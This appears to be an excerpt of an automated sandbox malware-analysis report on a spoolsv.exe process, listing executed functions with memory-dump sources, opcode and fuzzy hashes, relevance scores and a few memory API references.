Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e29a2fe25c48b18fb81fd325854f065f83bea9e5cfd9c6e5fa4c1d756930c93
Instruction ID: db612d950676be18e7f601c0fbd45a94404b7c3071b61b97b15b2c502f2b4b5f
Opcode Fuzzy Hash: 9e29a2fe25c48b18fb81fd325854f065f83bea9e5cfd9c6e5fa4c1d756930c93
Instruction Fuzzy Hash: 5CD01234B519044FCB1CB738885D8747391EB6A21679544A9D00BC72B1D96AED89C781

Function 00007FFD9BAC7CC0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8fe9579b1288120b62ecbb6d4d8fba81a26c438e3167d1aa37495394c54546d
Instruction ID: e0e82aeef429f2512135b9257190035146a371a3b341777c6d5fa0a97a89e56d
Opcode Fuzzy Hash: f8fe9579b1288120b62ecbb6d4d8fba81a26c438e3167d1aa37495394c54546d
Instruction Fuzzy Hash: 0BD01234B519044FC71CBB38885D8747391EB6A21679544A9E00AC76B1E96ADD89C741

Function 00007FFD9BAA4A07 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9baa0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caafc75bccc4d626e9344b6f4828711c605ff35942b0ce6db9da6086e27619d0
Instruction ID: 4cfea8ed714c9cd53ccead9ff6a048c941ff5c0b4e06b60bb06b7d2b4538ae97
Opcode Fuzzy Hash: caafc75bccc4d626e9344b6f4828711c605ff35942b0ce6db9da6086e27619d0
Instruction Fuzzy Hash: 80D05E24B0D94F8BE675AB8894B227E6292EF14300F120079F41EC31B7DF68EA528651

Function 00007FFD9BAC09D8 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 732ca6541526b7cf446a9177fa433f711b82714f592736b1e8ddba81355de3d2
Instruction ID: f53d6ee53664958979aa6a9a1c0370fa24a9b443fe26935fb6eac8b37c92cfaa
Opcode Fuzzy Hash: 732ca6541526b7cf446a9177fa433f711b82714f592736b1e8ddba81355de3d2
Instruction Fuzzy Hash: D2C012A144B6855FEA1167B5481E839BE90EE0623174944FDC45B8B173D15D4D458701

Function 00007FFD9BA92659 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9ba90000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21786359f24d74d5cb0e48d33721c1dc2d88f4597de78b25fd2a9a09beb49998
Instruction ID: 8ae3e76bfc65f8112ed61297da2c423067799d02a32610a60dfd6b84db4a3078
Opcode Fuzzy Hash: 21786359f24d74d5cb0e48d33721c1dc2d88f4597de78b25fd2a9a09beb49998
Instruction Fuzzy Hash: 37C08C11F1C81E0AF22A220408311BD00039F4470CF8002B4E02DCA2CECC1D59020286

Analysis Process: spoolsv.exePID: 7196, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9BAD0D4C Relevance: 1.5, Strings: 1, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5X_H, xrefs: 00007FFD9BAD0DF3

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bad0000_spoolsv.jbxd

Similarity

API ID:
String ID: 5X_H
API String ID: 0-3241812158
Opcode ID: 7621d645a148bd301a8ebfdaf6f4ab0fb9aff75d4802e4b8289bceae25f68dbb
Instruction ID: 6c5c749971c772d1cf3048cb7a4ab494e685e04f85400cce48381706b6127328
Opcode Fuzzy Hash: 7621d645a148bd301a8ebfdaf6f4ab0fb9aff75d4802e4b8289bceae25f68dbb
Instruction Fuzzy Hash: 0991F771A09ADD4FE759DB6888757A9BFE0FF9A314F4101AED049DB2E6CBB81410C701

Function 00007FFD9BB0187A Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef6670f609d1e3d1165e955d67c53f81938581748a02e6fe1fde1636a81be0cc
Instruction ID: a66077985863c8dedf5248efae1c909ee4ec194bf0ca59c5a3902b9f5d158c0d
Opcode Fuzzy Hash: ef6670f609d1e3d1165e955d67c53f81938581748a02e6fe1fde1636a81be0cc
Instruction Fuzzy Hash: 9EB1AA21F2D65E0AE32D895848521B977C2FF92309B16877DE8DBC34DBEE28E50742C1

Function 00007FFD9BADB32A Relevance: 1.6, APIs: 1, Instructions: 140
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFD9BADB40D

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAD7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bad7000_spoolsv.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3dd046f494026466eaa6f6dcd5329423d5092536f1f573e14a1cf0d65c01d104
Instruction ID: 2ce261ddc93c907ab3833ef2e3834049cee7365567f5723d050b8f959903a10f
Opcode Fuzzy Hash: 3dd046f494026466eaa6f6dcd5329423d5092536f1f573e14a1cf0d65c01d104
Instruction Fuzzy Hash: 37411931D0D7884FD719DBA89C166E97FE0EF96321F0443AFD099C31A2CA746406C792

Function 00007FFD9BADC211 Relevance: 1.5, APIs: 1, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAD7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bad7000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58139568904fb9b4207e803085d5fc0fb2de4611cc135ab0256ae9ef56005f3b
Instruction ID: 475589f793159d02063349f82568fc2ad7ae89af6ba0e78c6597ec94752cb555
Opcode Fuzzy Hash: 58139568904fb9b4207e803085d5fc0fb2de4611cc135ab0256ae9ef56005f3b
Instruction Fuzzy Hash: 22512A31B1DA5C0FD758A7AC98566B97BE1EB99321F4042BEE04DC32A3DD64A8428781

Function 00007FFD9BADC301 Relevance: 1.4, APIs: 1, Instructions: 126
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00007FFD9BADC3B4

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAD7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bad7000_spoolsv.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 27e2c1f54788e9883c95253d6cc215ad2e7cc8d03c968d987d7ee1875bfbac00
Instruction ID: 243e19a3b91667f07827e185cbbd048ec5aa7af68105d6167643a1346582b99e
Opcode Fuzzy Hash: 27e2c1f54788e9883c95253d6cc215ad2e7cc8d03c968d987d7ee1875bfbac00
Instruction Fuzzy Hash: DE31EC32A0CB4C4FDB1DAB6898166F9BBF4EFA6321F04426FD049C3153DA646916C7D1

Function 00007FFD9BB0B1D5 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9BB0B316

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 1b50cac943b000b5d7574eb3f9a5620766a6d566fa079849edeee89191a45842
Instruction ID: 9fa439abbfd85ffaf57fc636931a93cb66d8ddac368b1febeb6a140a825ca8f0
Opcode Fuzzy Hash: 1b50cac943b000b5d7574eb3f9a5620766a6d566fa079849edeee89191a45842
Instruction Fuzzy Hash: C2112B31E0EA8E0BDB25ABB454640F8BFA0EF96210B4605FBD459C71F7ED2C5986C741

Function 00007FFD9BAFEB79 Relevance: 1.3, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9BAFEB96

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 44720949db12bfa6aff02dbda90bedfb03b3ed3f65a51ef3199a2c489ce36e09
Instruction ID: e9f1184eb96d3a4bd3d5172f3e4f88ad01ce08d5e75364608e1492ebf7275b94
Opcode Fuzzy Hash: 44720949db12bfa6aff02dbda90bedfb03b3ed3f65a51ef3199a2c489ce36e09
Instruction Fuzzy Hash: 93E0657164E7C44FCB169A7448694557FA0EF6721174A41EEC046CF1A3DA1D8845C701

Function 00007FFD9BB0B2F9 Relevance: 1.3, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9BB0B316

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 63d51f3471c5dfaad535388e8b584589128e6117d739ef77d067a1f57dc05913
Instruction ID: 0f1efecd38bb050c1d4e5365532e646171bfe35e0ae0ca6ac7580255e69c7c10
Opcode Fuzzy Hash: 63d51f3471c5dfaad535388e8b584589128e6117d739ef77d067a1f57dc05913
Instruction Fuzzy Hash: C2E06D61A0E3C44FC71AAA3488688547F60AE6721134A42EFC045CF2A7EA2DCC89C701

Function 00007FFD9BB0B229 Relevance: 1.3, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9BB0B246

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 3a493e1f07753b25f85791029679fc289e8e3e4f43ebba4a4c0e4ee0cfd2b8bf
Instruction ID: 5054c90e81fd7596984a21cf810a4f56d6fe85e23d38542a42ac5d89697c8511
Opcode Fuzzy Hash: 3a493e1f07753b25f85791029679fc289e8e3e4f43ebba4a4c0e4ee0cfd2b8bf
Instruction Fuzzy Hash: EBE06D71A0E3C44FC71AAA7488688547F60AE6721134A42EFC045CF2A7EA2DC889C701

Function 00007FFD9BB0B7F9 Relevance: 1.3, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9BB0B816

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 8cf98c49196093b9fd1b34db1cb9625277d5c273f2d66fa5b83db06515938549
Instruction ID: 5e0d24586fb5abb28f4dfbdff3c66fda77de39efd4ff4322412aa7fe9dc843c2
Opcode Fuzzy Hash: 8cf98c49196093b9fd1b34db1cb9625277d5c273f2d66fa5b83db06515938549
Instruction Fuzzy Hash: 78E01A6194E3C44FCB06AB7488658543FA09E6B21178B40EEC145CF1B3E62D8C49C711

Function 00007FFD9BAF96F9 Relevance: 1.3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9BAF9716

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baf3000_spoolsv.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: b866f841d9b9c4e08012d50e7d247c5d17e707994ea494800eefe8e3a9dce0cb
Instruction ID: 51a1bd53b030367bad8d52c8cd18c23aa9d73a7d7ba1c6258bff2b94dcee8d33
Opcode Fuzzy Hash: b866f841d9b9c4e08012d50e7d247c5d17e707994ea494800eefe8e3a9dce0cb
Instruction Fuzzy Hash: B9E04F7154E3C44FCB1AEB7488798543F609E6B21078B40EEC545CF1B3E62DC949C702

Function 00007FFD9BAF98A9 Relevance: 1.3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9BAF98C6

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baf3000_spoolsv.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: f5c4e935433a4dfab3258f78af5bd54da001ed59ac097dbbb45e2a85a0141a96
Instruction ID: 9a4f488f590a39ca838e3e0db463a4ef5fa47a90ce9aa53407bd728164b76c4e
Opcode Fuzzy Hash: f5c4e935433a4dfab3258f78af5bd54da001ed59ac097dbbb45e2a85a0141a96
Instruction Fuzzy Hash: 5DE01A6194F7C44FCB16EB7588BA9447FA0AE6721078B40EEC085CF1B3E62D8949C701

Function 00007FFD9BB08F89 Relevance: 1.3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9BB08FA6

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 13ecfcd2c81a5e2b1babd7baa1cf29abef4373bf8770313296311c7961e4871e
Instruction ID: 2f5f8a24ab0adb6d2ec5f23760834800b8ca3a24d1a33cff3793935408ee755e
Opcode Fuzzy Hash: 13ecfcd2c81a5e2b1babd7baa1cf29abef4373bf8770313296311c7961e4871e
Instruction Fuzzy Hash: 1EE0656190E3C04FCB06EA34887A8047FA0AE6721078A40EEC185CF0B3EA298848C701

Function 00007FFD9BAE0BC6 Relevance: .9, Instructions: 870
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bae0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d72c25a0e76f2fde02d0efa9e06b542b2d165c7ce7a20a5968f43e3f263cd8
Instruction ID: 742611b759971d756ef267ac2c3c6568d29163d0c296b44880bb1b8383212815
Opcode Fuzzy Hash: 67d72c25a0e76f2fde02d0efa9e06b542b2d165c7ce7a20a5968f43e3f263cd8
Instruction Fuzzy Hash: E952F731B1995E4FEBA8EB5884A17B973D2FFA8340F0106B9D44DC32E3DE7469828741

Function 00007FFD9BAE1827 Relevance: .8, Instructions: 751
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bae0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a58b982082f0ee276586369edb22965e4c4b845e18d53f3d8dd6b5369620d7e9
Instruction ID: 7f6c2477569fb1465b7d3034a1b0f4a1da9e879e4bceca9790e617b031f17b43
Opcode Fuzzy Hash: a58b982082f0ee276586369edb22965e4c4b845e18d53f3d8dd6b5369620d7e9
Instruction Fuzzy Hash: 7B320731B1E95E4FEBA8EB5884A167973D2FFA8300F0506B9D45EC31E7DD34A9828741

Function 00007FFD9BAE10E2 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bae0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4aae38c9e84324de946bf17db110be6111be993653a6b3cb087cc1961f5024b
Instruction ID: 4a6bbc71943dc17d0f541167c014e0341ca44c87fe71e2e5fff1dd097157a88f
Opcode Fuzzy Hash: d4aae38c9e84324de946bf17db110be6111be993653a6b3cb087cc1961f5024b
Instruction Fuzzy Hash: B6122821F1E95E4FEBA8D76884A57B97392FFA8300F0601B9D44DC71E3DD686D428740

Function 00007FFD9BAF98E1 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baf3000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3856b394b799737ebcd85ac061e2076f5e8d7f0fcefebe26965a5ca3d67d4fb
Instruction ID: 6504a3bac9aed503e0bbdc6932a134279d4772c9aa3696b05ef6d4b848efe23f
Opcode Fuzzy Hash: b3856b394b799737ebcd85ac061e2076f5e8d7f0fcefebe26965a5ca3d67d4fb
Instruction Fuzzy Hash: 0B91B030B19A0D4FDB58EF69C4A9AA977E1FF98314B510179E41EC72A6DF38E842C740

Function 00007FFD9BAF996D Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baf3000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4031da1815031b187185aaaeddcb65973a04b46751f47909a670ca15ce7c1b51
Instruction ID: 00daf7da31176c61f658a1a53c092eba97baa3f582a293cc175129d38d4fc046
Opcode Fuzzy Hash: 4031da1815031b187185aaaeddcb65973a04b46751f47909a670ca15ce7c1b51
Instruction Fuzzy Hash: 36516130B1890E8FDB58EB59C4A4AA977E2FF98314F514179D01DC72A6CF74E842CB40

Function 00007FFD9BB0252D Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2a6adbbebd3966adf2aebcfd4eaeb2866170c30f37a894243e8e06691725c0c
Instruction ID: 4424b52bff687c02ec42c3921de337ba4f590a5aeb112616f1ba98b1e7ff8d8e
Opcode Fuzzy Hash: c2a6adbbebd3966adf2aebcfd4eaeb2866170c30f37a894243e8e06691725c0c
Instruction Fuzzy Hash: 2331CB31B0C6584FE728AB6C981A6BD37D1FF99319F05027EE48DC72D7DE285C468286

Function 00007FFD9BB02B01 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0b135d06ce6db7d818d50ee66f0d15b0b1a9f76e2d35dfc111790ce8fb39956
Instruction ID: 9dd255daa1f3369c4d24b57a5c4479c15b30699cdf16986628a63ff17412132f
Opcode Fuzzy Hash: a0b135d06ce6db7d818d50ee66f0d15b0b1a9f76e2d35dfc111790ce8fb39956
Instruction Fuzzy Hash: 20315731A0DA5D4FEB78DA98C8687B937A1FB99310F0501BED48DC72E6CD686C48C781

Function 00007FFD9BB0089A Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f59260348e8cd284fead6a9549b5ba8f885bc3b3e228f3b89973c07f9642cb8
Instruction ID: 07667e99a858be054b096f4f353090a0428a4232ff4226f6bf89b628286f2f09
Opcode Fuzzy Hash: 0f59260348e8cd284fead6a9549b5ba8f885bc3b3e228f3b89973c07f9642cb8
Instruction Fuzzy Hash: CA31C321B0E7CE0FE76297B804B55747FA1EF57614B8A00FAC489CB1F7E95C99068342

Function 00007FFD9BB07C00 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a5406dd388f4bd873ab76de9fbb14cb45dad476642bd9768dff04836cbde9c2
Instruction ID: b43262abcdcfc55a0fd39754f9607d5db7fe11dabe983e473c74def06452c6aa
Opcode Fuzzy Hash: 0a5406dd388f4bd873ab76de9fbb14cb45dad476642bd9768dff04836cbde9c2
Instruction Fuzzy Hash: C021E627B091650AE325F6BDB8754E43B90DF5563F70842BBE589CE4E7DC18508A8390

Function 00007FFD9BAD0C25 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bad0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07d6a0e135ac0ec41ad6072f318073aca62b8942e547fd31467b27439aed6797
Instruction ID: 43c2e189f3e1d2af973fde48fa019388cf16ff9530a99739eb68982764f5f8d3
Opcode Fuzzy Hash: 07d6a0e135ac0ec41ad6072f318073aca62b8942e547fd31467b27439aed6797
Instruction Fuzzy Hash: 21314D31B0D28D4FE331E7A898751EC7B60EF81325F4542B7D0588B1E3D9782645C785

Function 00007FFD9BB07C38 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e135f6b074de63a063344952585be561be00ad7581ea4541c0cd011b24c996bc
Instruction ID: 8673adb3d2d0d0c3b9c5e45922bb073d3f9b9851be61f1f4393ffcefe3d96397
Opcode Fuzzy Hash: e135f6b074de63a063344952585be561be00ad7581ea4541c0cd011b24c996bc
Instruction Fuzzy Hash: 9F11B627B095150AE329F6BDB8758F93790DF5513F70842B7E58DCE4E7EC18548A8290

Function 00007FFD9BB0BEA7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16c177d5af548f5be0f10033d890af524d3505fa0a33a428ce9115bc1af09cbd
Instruction ID: ad9e628bcf531b100c929cea9269691faa745895f91e55ae084dd3b0b13cb90c
Opcode Fuzzy Hash: 16c177d5af548f5be0f10033d890af524d3505fa0a33a428ce9115bc1af09cbd
Instruction Fuzzy Hash: A9212351B1A94F4BE7B89BA844B56797282FFA8308F154A79E18DC31EFCD287C428300

Function 00007FFD9BAD2718 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bad0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b38f32c0f0c861addd8d91187562667cfecd3698086ff74f307afa84635410a
Instruction ID: b702fd389b325bbcd86f13097ce2e300abe4a65ea74ce22d4172b0220c1f09c5
Opcode Fuzzy Hash: 6b38f32c0f0c861addd8d91187562667cfecd3698086ff74f307afa84635410a
Instruction Fuzzy Hash: 3A118F21E0E61E4AE774A7D8C4746B86291FF88710F1203B5D80EE32B2DD686E40CA44

Function 00007FFD9BAE42D7 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bae0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a2a96a83cf04f8584078f9213d62c4944578494ad29ac87cfdb3b8807a36b37
Instruction ID: 5f36404259e0f78685f158c9189ca90b453c6243a99052c73cceaa61e88119a1
Opcode Fuzzy Hash: 3a2a96a83cf04f8584078f9213d62c4944578494ad29ac87cfdb3b8807a36b37
Instruction Fuzzy Hash: A01146A294F3C61FD3178BB04C365A57FB0AF23214B4E81EBC0898B1A3E55D194AC722

Function 00007FFD9BAD0C38 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bad0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30924846c19bb91256893656bcb37786426885d9d1977b608b94d5fbbe0a58d5
Instruction ID: c3b06e471fe69c45af8839f1bbe47076dcc10ac84510ce2ed40023da08f14231
Opcode Fuzzy Hash: 30924846c19bb91256893656bcb37786426885d9d1977b608b94d5fbbe0a58d5
Instruction Fuzzy Hash: 38110635B0E68D8FE722DBA888751DC7FB0EF82711F4646B7C084DB1A2D5781645C784

Function 00007FFD9BAD108D Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bad0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
